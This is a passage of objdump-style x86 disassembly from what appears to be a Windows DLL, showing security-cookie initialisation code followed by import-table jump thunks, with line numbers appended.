10001ac3: 3b f7 cmp %edi,%esi 1048 | 10001ac5: 75 07 jne 0x10001ace 1049 | 10001ac7: be 4f e6 40 bb mov $0xbb40e64f,%esi 1050 | 10001acc: eb 0b jmp 0x10001ad9 1051 | 10001ace: 85 f3 test %esi,%ebx 1052 | 10001ad0: 75 07 jne 0x10001ad9 1053 | 10001ad2: 8b c6 mov %esi,%eax 1054 | 10001ad4: c1 e0 10 shl $0x10,%eax 1055 | 10001ad7: 0b f0 or %eax,%esi 1056 | 10001ad9: 89 35 00 30 00 10 mov %esi,0x10003000 1057 | 10001adf: f7 d6 not %esi 1058 | 10001ae1: 89 35 04 30 00 10 mov %esi,0x10003004 1059 | 10001ae7: 5e pop %esi 1060 | 10001ae8: 5f pop %edi 1061 | 10001ae9: 5b pop %ebx 1062 | 10001aea: c9 leave 1063 | 10001aeb: c3 ret 1064 | 10001aec: ff 25 4c 20 00 10 jmp *0x1000204c 1065 | 10001af2: ff 25 48 20 00 10 jmp *0x10002048 1066 | 10001af8: ff 25 44 20 00 10 jmp *0x10002044 1067 | 10001afe: ff 25 3c 20 00 10 jmp *0x1000203c 1068 | 10001b04: ff 25 38 20 00 10 jmp *0x10002038 1069 | 10001b0a: ff 25 40 20 00 10 jmp *0x10002040 1070 | --------------------------------------------------------------------------------